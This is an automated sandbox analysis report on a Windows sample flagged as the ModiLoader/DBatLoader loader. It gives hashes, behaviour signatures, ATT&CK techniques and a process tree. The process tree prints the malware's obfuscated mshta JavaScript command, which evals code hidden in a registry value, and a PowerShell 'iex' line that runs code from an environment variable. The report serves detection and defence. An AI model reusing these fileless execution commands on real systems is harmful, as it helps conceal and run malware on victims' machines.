Analysis

  • max time kernel
    142s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-06-2024 10:14

General

  • Target

    b816369b655826e66fde3618f30a545c_JaffaCakes118.exe

  • Size

    277KB

  • MD5

    b816369b655826e66fde3618f30a545c

  • SHA1

    47cb7037339f019b345c85accdbf3c28f9aaaeee

  • SHA256

    57aaffcdd21b962bcf1c34c032f69c1ec1c680c23d1816688dc7dbe1175b5702

  • SHA512

    a277a2d8c95c4205d021c4459666831054a39ddd08f4614bbb13ee9ebb52f45f6f7a632344894777e692aeff55b06e1d1cdbe7280928413c09de73dcf43737c2

  • SSDEEP

    3072:ocWRylkb9JD4R0lYZAI3rr1GvRkIG+Y+fDm07pID6XuNL5SfSwyOipMsEZr:oc4yu9JCEYZpYJJGV+bu6uNLxFRc

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b816369b655826e66fde3618f30a545c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b816369b655826e66fde3618f30a545c_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Users\Admin\AppData\Local\Temp\b816369b655826e66fde3618f30a545c_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\b816369b655826e66fde3618f30a545c_JaffaCakes118.exe"
      2⤵
        PID:552
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:c5IxxgTgy0="LzcJl";kv4=new%20ActiveXObject("WScript.Shell");WhLUqXCB4="ta";wc9YT=kv4.RegRead("HKLM\\software\\Wow6432Node\\INU9SKJ7i1\\at8STe");oikfRI4="I9JfX";eval(wc9YT);IFmcv4E2Io="p";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:776
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:peri
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1796
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4312,i,3833046924978547022,12404847742964713612,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:8
      1⤵
        PID:1136

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4yd2ae3a.kjs.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/552-10-0x00000000009A0000-0x0000000000A74000-memory.dmp
        Filesize

        848KB

      • memory/552-11-0x00000000009A0000-0x0000000000A74000-memory.dmp
        Filesize

        848KB

      • memory/552-6-0x00000000009A0000-0x0000000000A74000-memory.dmp
        Filesize

        848KB

      • memory/552-8-0x00000000009A0000-0x0000000000A74000-memory.dmp
        Filesize

        848KB

      • memory/552-4-0x0000000000400000-0x0000000000439000-memory.dmp
        Filesize

        228KB

      • memory/552-9-0x00000000009A0000-0x0000000000A74000-memory.dmp
        Filesize

        848KB

      • memory/552-7-0x00000000009A0000-0x0000000000A74000-memory.dmp
        Filesize

        848KB

      • memory/552-12-0x00000000009A0000-0x0000000000A74000-memory.dmp
        Filesize

        848KB

      • memory/552-2-0x0000000000400000-0x0000000000439000-memory.dmp
        Filesize

        228KB

      • memory/552-5-0x0000000000400000-0x0000000000439000-memory.dmp
        Filesize

        228KB

      • memory/1796-30-0x0000000006680000-0x00000000066CC000-memory.dmp
        Filesize

        304KB

      • memory/1796-16-0x0000000005890000-0x00000000058B2000-memory.dmp
        Filesize

        136KB

      • memory/1796-17-0x0000000005930000-0x0000000005996000-memory.dmp
        Filesize

        408KB

      • memory/1796-18-0x0000000006110000-0x0000000006176000-memory.dmp
        Filesize

        408KB

      • memory/1796-32-0x0000000006B50000-0x0000000006B6A000-memory.dmp
        Filesize

        104KB

      • memory/1796-28-0x0000000006180000-0x00000000064D4000-memory.dmp
        Filesize

        3.3MB

      • memory/1796-29-0x0000000006630000-0x000000000664E000-memory.dmp
        Filesize

        120KB

      • memory/1796-14-0x0000000002F50000-0x0000000002F86000-memory.dmp
        Filesize

        216KB

      • memory/1796-31-0x0000000007E90000-0x000000000850A000-memory.dmp
        Filesize

        6.5MB

      • memory/1796-15-0x0000000005A70000-0x0000000006098000-memory.dmp
        Filesize

        6.2MB